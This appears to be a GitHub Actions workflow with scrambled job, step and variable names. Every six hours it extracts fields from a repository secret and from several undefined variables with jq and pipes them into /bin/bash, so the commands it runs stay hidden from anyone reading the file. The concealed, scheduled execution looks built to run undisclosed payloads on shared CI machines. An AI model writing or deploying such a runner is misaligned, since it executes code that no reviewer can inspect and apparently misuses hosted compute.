name: wanyusui2314
on:
  workflow_dispatch:
  schedule:
    - cron: '34 3/6 * * *'
jobs:  # 21050
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wanyusui2314
        env:
          hax8383: ${{ secrets.hax8383 }}
        run: |
          echo $hax8383 | jq -r .ql9 | /bin/bash
          echo $fgkkc52966 | jq -r .xwo587 | /bin/bash
          echo $a9622 | jq -r .dhd152 | /bin/bash
          echo $yu3 | jq -r .lhe4650 | /bin/bash

